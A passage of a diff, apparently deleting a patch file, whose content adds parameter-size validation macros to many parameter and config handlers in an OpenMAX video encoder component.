-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE);
-                 OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType = (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamCompBufferSupplier");
-                 if (bufferSupplierType->nPortIndex ==(OMX_U32) PORT_INDEX_IN) {
-@@ -1653,6 +1670,7 @@
- 
-         case OMX_IndexParamVideoQuantization:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_QUANTIZATIONTYPE);
-                 OMX_VIDEO_PARAM_QUANTIZATIONTYPE *session_qp = (OMX_VIDEO_PARAM_QUANTIZATIONTYPE*) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoQuantization");
-                 memcpy(session_qp, &m_sSessionQuantization, sizeof(m_sSessionQuantization));
-@@ -1661,6 +1679,7 @@
- 
-         case OMX_QcomIndexParamVideoQPRange:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_QPRANGETYPE);
-                 OMX_QCOM_VIDEO_PARAM_QPRANGETYPE *qp_range = (OMX_QCOM_VIDEO_PARAM_QPRANGETYPE*) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexParamVideoQPRange");
-                 memcpy(qp_range, &m_sSessionQPRange, sizeof(m_sSessionQPRange));
-@@ -1669,6 +1688,7 @@
- 
-         case OMX_IndexParamVideoErrorCorrection:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE);
-                 OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE* errorresilience = (OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE*)paramData;
-                 DEBUG_PRINT_LOW("OMX_IndexParamVideoErrorCorrection");
-                 errorresilience->bEnableHEC = m_sErrorCorrection.bEnableHEC;
-@@ -1678,6 +1698,7 @@
-             }
-         case OMX_IndexParamVideoIntraRefresh:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_INTRAREFRESHTYPE);
-                 OMX_VIDEO_PARAM_INTRAREFRESHTYPE* intrarefresh = (OMX_VIDEO_PARAM_INTRAREFRESHTYPE*)paramData;
-                 DEBUG_PRINT_LOW("OMX_IndexParamVideoIntraRefresh");
-                 DEBUG_PRINT_ERROR("OMX_IndexParamVideoIntraRefresh GET");
-@@ -1690,6 +1711,7 @@
-             break;
-         case OMX_COMPONENT_CAPABILITY_TYPE_INDEX:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMXComponentCapabilityFlagsType);
-                 OMXComponentCapabilityFlagsType *pParam = reinterpret_cast<OMXComponentCapabilityFlagsType*>(paramData);
-                 DEBUG_PRINT_LOW("get_parameter: OMX_COMPONENT_CAPABILITY_TYPE_INDEX");
-                 pParam->iIsOMXComponentMultiThreaded = OMX_TRUE;
-@@ -1707,6 +1729,7 @@
- #if !defined(MAX_RES_720P) || defined(_MSM8974_)
-         case OMX_QcomIndexParamIndexExtraDataType:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXEXTRADATATYPE);
-                 DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexParamIndexExtraDataType");
-                 QOMX_INDEXEXTRADATATYPE *pParam = (QOMX_INDEXEXTRADATATYPE *)paramData;
-                 if (pParam->nIndex == (OMX_INDEXTYPE)OMX_ExtraDataVideoEncoderSliceInfo) {
-@@ -1752,6 +1775,7 @@
-             }
-         case QOMX_IndexParamVideoLTRCountRangeSupported:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_RANGETYPE);
-                 DEBUG_PRINT_HIGH("get_parameter: QOMX_IndexParamVideoLTRCountRangeSupported");
-                 QOMX_EXTNINDEX_RANGETYPE *pParam = (QOMX_EXTNINDEX_RANGETYPE *)paramData;
-                 if (pParam->nPortIndex == PORT_INDEX_OUT) {
-@@ -1772,6 +1796,7 @@
-             break;
-         case OMX_QcomIndexParamVideoLTRCount:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_LTRCOUNT_TYPE);
-                 DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexParamVideoLTRCount");
-                 OMX_QCOM_VIDEO_PARAM_LTRCOUNT_TYPE *pParam =
-                         reinterpret_cast<OMX_QCOM_VIDEO_PARAM_LTRCOUNT_TYPE*>(paramData);
-@@ -1781,6 +1806,7 @@
- #endif
-         case QOMX_IndexParamVideoSyntaxHdr:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE);
-                 DEBUG_PRINT_HIGH("QOMX_IndexParamVideoSyntaxHdr");
-                 QOMX_EXTNINDEX_PARAMTYPE* pParam =
-                     reinterpret_cast<QOMX_EXTNINDEX_PARAMTYPE*>(paramData);
-@@ -1826,6 +1852,7 @@
-             }
-         case OMX_QcomIndexHierarchicalStructure:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_HIERARCHICALLAYERS);
-                 QOMX_VIDEO_HIERARCHICALLAYERS* hierp = (QOMX_VIDEO_HIERARCHICALLAYERS*) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexHierarchicalStructure");
-                 memcpy(hierp, &m_sHierLayers, sizeof(m_sHierLayers));
-@@ -1833,6 +1860,7 @@
-             }
-         case OMX_QcomIndexParamPerfLevel:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PERF_LEVEL);
-                 OMX_U32 perflevel;
-                 OMX_QCOM_VIDEO_PARAM_PERF_LEVEL *pParam =
-                     reinterpret_cast<OMX_QCOM_VIDEO_PARAM_PERF_LEVEL*>(paramData);
-@@ -1847,6 +1875,7 @@
-             }
-         case OMX_QcomIndexParamH264VUITimingInfo:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_VUI_TIMING_INFO);
-                 OMX_U32 enabled;
-                 OMX_QCOM_VIDEO_PARAM_VUI_TIMING_INFO *pParam =
-                     reinterpret_cast<OMX_QCOM_VIDEO_PARAM_VUI_TIMING_INFO*>(paramData);
-@@ -1861,6 +1890,7 @@
-             }
-         case OMX_QcomIndexParamPeakBitrate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PEAK_BITRATE);
-                 OMX_U32 peakbitrate;
-                 OMX_QCOM_VIDEO_PARAM_PEAK_BITRATE *pParam =
-                     reinterpret_cast<OMX_QCOM_VIDEO_PARAM_PEAK_BITRATE*>(paramData);
-@@ -1875,6 +1905,7 @@
-             }
-          case QOMX_IndexParamVideoInitialQp:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_VIDEO_INITIALQP);
-                  QOMX_EXTNINDEX_VIDEO_INITIALQP* initqp =
-                      reinterpret_cast<QOMX_EXTNINDEX_VIDEO_INITIALQP *>(paramData);
-                      memcpy(initqp, &m_sParamInitqp, sizeof(m_sParamInitqp));
-@@ -1934,18 +1965,21 @@
-     switch ((int)configIndex) {
-         case OMX_IndexConfigVideoBitrate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_BITRATETYPE);
-                 OMX_VIDEO_CONFIG_BITRATETYPE* pParam = reinterpret_cast<OMX_VIDEO_CONFIG_BITRATETYPE*>(configData);
-                 memcpy(pParam, &m_sConfigBitrate, sizeof(m_sConfigBitrate));
-                 break;
-             }
-         case OMX_IndexConfigVideoFramerate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_FRAMERATETYPE);
-                 OMX_CONFIG_FRAMERATETYPE* pParam = reinterpret_cast<OMX_CONFIG_FRAMERATETYPE*>(configData);
-                 memcpy(pParam, &m_sConfigFramerate, sizeof(m_sConfigFramerate));
-                 break;
-             }
-         case OMX_IndexConfigCommonRotate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_ROTATIONTYPE);
-                 OMX_CONFIG_ROTATIONTYPE* pParam = reinterpret_cast<OMX_CONFIG_ROTATIONTYPE*>(configData);
-                 memcpy(pParam, &m_sConfigFrameRotation, sizeof(m_sConfigFrameRotation));
-                 break;
-@@ -1953,12 +1987,14 @@
-         case QOMX_IndexConfigVideoIntraperiod:
-             {
-                 DEBUG_PRINT_LOW("get_config:QOMX_IndexConfigVideoIntraperiod");
-+                VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_INTRAPERIODTYPE);
-                 QOMX_VIDEO_INTRAPERIODTYPE* pParam = reinterpret_cast<QOMX_VIDEO_INTRAPERIODTYPE*>(configData);
-                 memcpy(pParam, &m_sIntraperiod, sizeof(m_sIntraperiod));
-                 break;
-             }
-         case OMX_IndexConfigVideoAVCIntraPeriod:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_AVCINTRAPERIOD);
-                 OMX_VIDEO_CONFIG_AVCINTRAPERIOD *pParam =
-                     reinterpret_cast<OMX_VIDEO_CONFIG_AVCINTRAPERIOD*>(configData);
-                 DEBUG_PRINT_LOW("get_config: OMX_IndexConfigVideoAVCIntraPeriod");
-@@ -1967,6 +2003,7 @@
-             }
-         case OMX_IndexConfigCommonDeinterlace:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_DEINTERLACE);
-                 OMX_VIDEO_CONFIG_DEINTERLACE *pParam =
-                     reinterpret_cast<OMX_VIDEO_CONFIG_DEINTERLACE*>(configData);
-                 DEBUG_PRINT_LOW("get_config: OMX_IndexConfigCommonDeinterlace");
-@@ -1975,6 +2012,7 @@
-             }
-        case OMX_IndexConfigVideoVp8ReferenceFrame:
-            {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_VP8REFERENCEFRAMETYPE);
-                OMX_VIDEO_VP8REFERENCEFRAMETYPE* pParam =
-                    reinterpret_cast<OMX_VIDEO_VP8REFERENCEFRAMETYPE*>(configData);
-                DEBUG_PRINT_LOW("get_config: OMX_IndexConfigVideoVp8ReferenceFrame");
-@@ -1983,6 +2021,7 @@
-            }
-         case OMX_QcomIndexConfigPerfLevel:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL);
-                 OMX_U32 perflevel;
-                 OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL *pParam =
-                     reinterpret_cast<OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL*>(configData);
-diff --git a/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp b/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp
-index a72e07e..70d6260 100644
---- a/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp
-+++ b/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp
-@@ -577,6 +577,7 @@
-     switch ((int)paramIndex) {
-         case OMX_IndexParamPortDefinition:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE);
-                 OMX_PARAM_PORTDEFINITIONTYPE *portDefn;
-                 portDefn = (OMX_PARAM_PORTDEFINITIONTYPE *) paramData;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamPortDefinition H= %d, W = %d",
-@@ -676,6 +677,7 @@
- 
-         case OMX_IndexParamVideoPortFormat:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE);
-                 OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt =
-                     (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoPortFormat %d",
-@@ -719,6 +721,7 @@
-             break;
-         case OMX_IndexParamVideoInit:
-             { //TODO, do we need this index set param
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
-                 OMX_PORT_PARAM_TYPE* pParam = (OMX_PORT_PARAM_TYPE*)(paramData);
-                 DEBUG_PRINT_LOW("Set OMX_IndexParamVideoInit called");
-                 break;
-@@ -726,6 +729,7 @@
- 
-         case OMX_IndexParamVideoBitrate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_BITRATETYPE);
-                 OMX_VIDEO_PARAM_BITRATETYPE* pParam = (OMX_VIDEO_PARAM_BITRATETYPE*)paramData;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoBitrate");
-                 if (handle->venc_set_param(paramData,OMX_IndexParamVideoBitrate) != true) {
-@@ -742,6 +746,7 @@
-             }
-         case OMX_IndexParamVideoMpeg4:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_MPEG4TYPE);
-                 OMX_VIDEO_PARAM_MPEG4TYPE* pParam = (OMX_VIDEO_PARAM_MPEG4TYPE*)paramData;
-                 OMX_VIDEO_PARAM_MPEG4TYPE mp4_param;
-                 memcpy(&mp4_param, pParam, sizeof(struct OMX_VIDEO_PARAM_MPEG4TYPE));
-@@ -795,6 +800,7 @@
-             }
-         case OMX_IndexParamVideoAvc:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_AVCTYPE);
-                 OMX_VIDEO_PARAM_AVCTYPE* pParam = (OMX_VIDEO_PARAM_AVCTYPE*)paramData;
-                 OMX_VIDEO_PARAM_AVCTYPE avc_param;
-                 memcpy(&avc_param, pParam, sizeof( struct OMX_VIDEO_PARAM_AVCTYPE));
-@@ -854,6 +860,7 @@
-             }
-         case (OMX_INDEXTYPE)OMX_IndexParamVideoVp8:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_VP8TYPE);
-                 OMX_VIDEO_PARAM_VP8TYPE* pParam = (OMX_VIDEO_PARAM_VP8TYPE*)paramData;
-                 OMX_VIDEO_PARAM_VP8TYPE vp8_param;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoVp8");
-@@ -870,6 +877,7 @@
-             }
-         case (OMX_INDEXTYPE)OMX_IndexParamVideoHevc:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_HEVCTYPE);
-                 OMX_VIDEO_PARAM_HEVCTYPE* pParam = (OMX_VIDEO_PARAM_HEVCTYPE*)paramData;
-                 OMX_VIDEO_PARAM_HEVCTYPE hevc_param;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoHevc");
-@@ -883,6 +891,7 @@
-             }
-         case OMX_IndexParamVideoProfileLevelCurrent:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
-                 OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam = (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoProfileLevelCurrent");
-                 if (handle->venc_set_param(pParam,OMX_IndexParamVideoProfileLevelCurrent) != true) {
-@@ -937,6 +946,7 @@
-             }
-         case OMX_IndexParamStandardComponentRole:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE);
-                 OMX_PARAM_COMPONENTROLETYPE *comp_role;
-                 comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamStandardComponentRole %s",
-@@ -1007,6 +1017,7 @@
- 
-         case OMX_IndexParamPriorityMgmt:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE);
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamPriorityMgmt");
-                 if (m_state != OMX_StateLoaded) {
-                     DEBUG_PRINT_ERROR("ERROR: Set Parameter called in Invalid State");
-@@ -1027,6 +1038,7 @@
- 
-         case OMX_IndexParamCompBufferSupplier:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE);
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamCompBufferSupplier");
-                 OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType = (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamCompBufferSupplier %d",
-@@ -1043,6 +1055,7 @@
-             }
-         case OMX_IndexParamVideoQuantization:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_QUANTIZATIONTYPE);
-                 DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoQuantization");
-                 OMX_VIDEO_PARAM_QUANTIZATIONTYPE *session_qp = (OMX_VIDEO_PARAM_QUANTIZATIONTYPE*) paramData;
-                 if (session_qp->nPortIndex == PORT_INDEX_OUT) {
-@@ -1061,6 +1074,7 @@
- 
-         case OMX_QcomIndexParamVideoQPRange:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_QPRANGETYPE);
-                 DEBUG_PRINT_LOW("set_parameter: OMX_QcomIndexParamVideoQPRange");
-                 OMX_QCOM_VIDEO_PARAM_QPRANGETYPE *qp_range = (OMX_QCOM_VIDEO_PARAM_QPRANGETYPE*) paramData;
-                 if (qp_range->nPortIndex == PORT_INDEX_OUT) {
-@@ -1079,6 +1093,7 @@
- 
-         case OMX_QcomIndexPortDefn:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_PARAM_PORTDEFINITIONTYPE);
-                 OMX_QCOM_PARAM_PORTDEFINITIONTYPE* pParam =
-                     (OMX_QCOM_PARAM_PORTDEFINITIONTYPE*)paramData;
-                 DEBUG_PRINT_LOW("set_parameter: OMX_QcomIndexPortDefn");
-@@ -1105,6 +1120,7 @@
- 
-         case OMX_IndexParamVideoErrorCorrection:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE);
-                 DEBUG_PRINT_LOW("OMX_IndexParamVideoErrorCorrection");
-                 OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE* pParam =
-                     (OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE*)paramData;
-@@ -1117,6 +1133,7 @@
-             }
-         case OMX_IndexParamVideoIntraRefresh:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_INTRAREFRESHTYPE);
-                 DEBUG_PRINT_LOW("set_param:OMX_IndexParamVideoIntraRefresh");
-                 OMX_VIDEO_PARAM_INTRAREFRESHTYPE* pParam =
-                     (OMX_VIDEO_PARAM_INTRAREFRESHTYPE*)paramData;
-@@ -1130,6 +1147,7 @@
- #ifdef _ANDROID_ICS_
-         case OMX_QcomIndexParamVideoMetaBufferMode:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, StoreMetaDataInBuffersParams);
-                 StoreMetaDataInBuffersParams *pParam =
-                     (StoreMetaDataInBuffersParams*)paramData;
-                 DEBUG_PRINT_HIGH("set_parameter:OMX_QcomIndexParamVideoMetaBufferMode: "
-@@ -1176,6 +1194,7 @@
- #if !defined(MAX_RES_720P) || defined(_MSM8974_)
-         case OMX_QcomIndexParamIndexExtraDataType:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXEXTRADATATYPE);
-                 DEBUG_PRINT_HIGH("set_parameter: OMX_QcomIndexParamIndexExtraDataType");
-                 QOMX_INDEXEXTRADATATYPE *pParam = (QOMX_INDEXEXTRADATATYPE *)paramData;
-                 bool enable = false;
-@@ -1256,6 +1275,7 @@
-             }
-         case QOMX_IndexParamVideoLTRMode:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_PARAM_LTRMODE_TYPE);
-                 QOMX_VIDEO_PARAM_LTRMODE_TYPE* pParam =
-                     (QOMX_VIDEO_PARAM_LTRMODE_TYPE*)paramData;
-                 if (!handle->venc_set_param(paramData, (OMX_INDEXTYPE)QOMX_IndexParamVideoLTRMode)) {
-@@ -1267,6 +1287,7 @@
-             }
-         case QOMX_IndexParamVideoLTRCount:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_PARAM_LTRCOUNT_TYPE);
-                 QOMX_VIDEO_PARAM_LTRCOUNT_TYPE* pParam =
-                     (QOMX_VIDEO_PARAM_LTRCOUNT_TYPE*)paramData;
-                 if (!handle->venc_set_param(paramData, (OMX_INDEXTYPE)QOMX_IndexParamVideoLTRCount)) {
-@@ -1279,6 +1300,7 @@
- #endif
-         case OMX_QcomIndexParamVideoMaxAllowedBitrateCheck:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE);
-                 QOMX_EXTNINDEX_PARAMTYPE* pParam =
-                     (QOMX_EXTNINDEX_PARAMTYPE*)paramData;
-                 if (pParam->nPortIndex == PORT_INDEX_OUT) {
-@@ -1296,6 +1318,7 @@
- #ifdef MAX_RES_1080P
-         case OMX_QcomIndexEnableSliceDeliveryMode:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE);
-                 QOMX_EXTNINDEX_PARAMTYPE* pParam =
-                     (QOMX_EXTNINDEX_PARAMTYPE*)paramData;
-                 if (pParam->nPortIndex == PORT_INDEX_OUT) {
-@@ -1314,6 +1337,7 @@
- #endif
-         case OMX_QcomIndexEnableH263PlusPType:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE);
-                 QOMX_EXTNINDEX_PARAMTYPE* pParam =
-                     (QOMX_EXTNINDEX_PARAMTYPE*)paramData;
-                 DEBUG_PRINT_LOW("OMX_QcomIndexEnableH263PlusPType");
-@@ -1332,6 +1356,7 @@
-             }
-         case OMX_QcomIndexParamSequenceHeaderWithIDR:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, PrependSPSPPSToIDRFramesParams);
-                 if(!handle->venc_set_param(paramData,
-                             (OMX_INDEXTYPE)OMX_QcomIndexParamSequenceHeaderWithIDR)) {
-                     DEBUG_PRINT_ERROR("%s: %s",
-@@ -1343,6 +1368,7 @@
-             }
-         case OMX_QcomIndexParamH264AUDelimiter:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_CONFIG_H264_AUD);
-                 if(!handle->venc_set_param(paramData,
-                             (OMX_INDEXTYPE)OMX_QcomIndexParamH264AUDelimiter)) {
-                     DEBUG_PRINT_ERROR("%s: %s",
-@@ -1354,6 +1380,7 @@
-             }
-        case OMX_QcomIndexHierarchicalStructure:
-            {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_HIERARCHICALLAYERS);
-                 QOMX_VIDEO_HIERARCHICALLAYERS* pParam =
-                     (QOMX_VIDEO_HIERARCHICALLAYERS*)paramData;
-                 DEBUG_PRINT_LOW("OMX_QcomIndexHierarchicalStructure");
-@@ -1377,6 +1404,7 @@
-            }
-         case OMX_QcomIndexParamPerfLevel:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PERF_LEVEL);
-                 if (!handle->venc_set_param(paramData,
-                             (OMX_INDEXTYPE) OMX_QcomIndexParamPerfLevel)) {
-                     DEBUG_PRINT_ERROR("ERROR: Setting performance level");
-@@ -1386,6 +1414,7 @@
-             }
-         case OMX_QcomIndexParamH264VUITimingInfo:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_VUI_TIMING_INFO);
-                 if (!handle->venc_set_param(paramData,
-                             (OMX_INDEXTYPE) OMX_QcomIndexParamH264VUITimingInfo)) {
-                     DEBUG_PRINT_ERROR("ERROR: Setting VUI timing info");
-@@ -1395,6 +1424,7 @@
-             }
-         case OMX_QcomIndexParamPeakBitrate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PEAK_BITRATE);
-                 if (!handle->venc_set_param(paramData,
-                             (OMX_INDEXTYPE) OMX_QcomIndexParamPeakBitrate)) {
-                     DEBUG_PRINT_ERROR("ERROR: Setting peak bitrate");
-@@ -1404,6 +1434,7 @@
-              }
-        case QOMX_IndexParamVideoInitialQp:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_VIDEO_INITIALQP);
-                 if(!handle->venc_set_param(paramData,
-                             (OMX_INDEXTYPE)QOMX_IndexParamVideoInitialQp)) {
-                     DEBUG_PRINT_ERROR("Request to Enable initial QP failed");
-@@ -1423,6 +1454,7 @@
-             }
-         case OMX_QcomIndexParamVideoHybridHierpMode:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_VIDEO_HYBRID_HP_MODE);
-                if(!handle->venc_set_param(paramData,
-                          (OMX_INDEXTYPE)OMX_QcomIndexParamVideoHybridHierpMode)) {
-                    DEBUG_PRINT_ERROR("Request to Enable Hybrid Hier-P failed");
-@@ -1527,6 +1559,7 @@
-     switch ((int)configIndex) {
-         case OMX_IndexConfigVideoBitrate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_BITRATETYPE);
-                 OMX_VIDEO_CONFIG_BITRATETYPE* pParam =
-                     reinterpret_cast<OMX_VIDEO_CONFIG_BITRATETYPE*>(configData);
-                 DEBUG_PRINT_HIGH("set_config(): OMX_IndexConfigVideoBitrate (%u)", (unsigned int)pParam->nEncodeBitrate);
-@@ -1548,6 +1581,7 @@
-             }
-         case OMX_IndexConfigVideoFramerate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_FRAMERATETYPE);
-                 OMX_CONFIG_FRAMERATETYPE* pParam =
-                     reinterpret_cast<OMX_CONFIG_FRAMERATETYPE*>(configData);
-                 DEBUG_PRINT_HIGH("set_config(): OMX_IndexConfigVideoFramerate (0x%x)", (unsigned int)pParam->xEncodeFramerate);
-@@ -1570,6 +1604,7 @@
-             }
-         case QOMX_IndexConfigVideoIntraperiod:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_INTRAPERIODTYPE);
-                 QOMX_VIDEO_INTRAPERIODTYPE* pParam =
-                     reinterpret_cast<QOMX_VIDEO_INTRAPERIODTYPE*>(configData);
- 
-@@ -1627,6 +1662,7 @@
- 
-         case OMX_IndexConfigVideoIntraVOPRefresh:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_INTRAREFRESHVOPTYPE);
-                 OMX_CONFIG_INTRAREFRESHVOPTYPE* pParam =
-                     reinterpret_cast<OMX_CONFIG_INTRAREFRESHVOPTYPE*>(configData);
- 
-@@ -1648,6 +1684,7 @@
-             }
-         case OMX_IndexConfigCommonRotate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_ROTATIONTYPE);
-                 OMX_CONFIG_ROTATIONTYPE *pParam =
-                     reinterpret_cast<OMX_CONFIG_ROTATIONTYPE*>(configData);
-                 OMX_S32 nRotation;
-@@ -1695,6 +1732,7 @@
-             {
-                 DEBUG_PRINT_HIGH("set_config(): OMX_QcomIndexConfigVideoFramePackingArrangement");
-                 if (m_sOutPortFormat.eCompressionFormat == OMX_VIDEO_CodingAVC) {
-+                    VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_FRAME_PACK_ARRANGEMENT);
-                     OMX_QCOM_FRAME_PACK_ARRANGEMENT *configFmt =
-                         (OMX_QCOM_FRAME_PACK_ARRANGEMENT *) configData;
-                     extra_data_handle.set_frame_pack_data(configFmt);
-@@ -1705,6 +1743,7 @@
-             }
-         case QOMX_IndexConfigVideoLTRPeriod:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_CONFIG_LTRPERIOD_TYPE);
-                 QOMX_VIDEO_CONFIG_LTRPERIOD_TYPE* pParam = (QOMX_VIDEO_CONFIG_LTRPERIOD_TYPE*)configData;
-                 if (!handle->venc_set_config(configData, (OMX_INDEXTYPE)QOMX_IndexConfigVideoLTRPeriod)) {
-                     DEBUG_PRINT_ERROR("ERROR: Setting LTR period failed");
-@@ -1716,6 +1755,7 @@
- 
-        case OMX_IndexConfigVideoVp8ReferenceFrame:
-            {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_VP8REFERENCEFRAMETYPE);
-                OMX_VIDEO_VP8REFERENCEFRAMETYPE* pParam = (OMX_VIDEO_VP8REFERENCEFRAMETYPE*) configData;
-                if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE) OMX_IndexConfigVideoVp8ReferenceFrame)) {
-                    DEBUG_PRINT_ERROR("ERROR: Setting VP8 reference frame");
-@@ -1727,6 +1767,7 @@
- 
-         case QOMX_IndexConfigVideoLTRUse:
-             {
-+                VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_CONFIG_LTRUSE_TYPE);
-                 QOMX_VIDEO_CONFIG_LTRUSE_TYPE* pParam = (QOMX_VIDEO_CONFIG_LTRUSE_TYPE*)configData;
-                 if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)QOMX_IndexConfigVideoLTRUse)) {
-                     DEBUG_PRINT_ERROR("ERROR: Setting LTR use failed");
-@@ -1737,6 +1778,7 @@
-             }
-         case QOMX_IndexConfigVideoLTRMark:
-             {
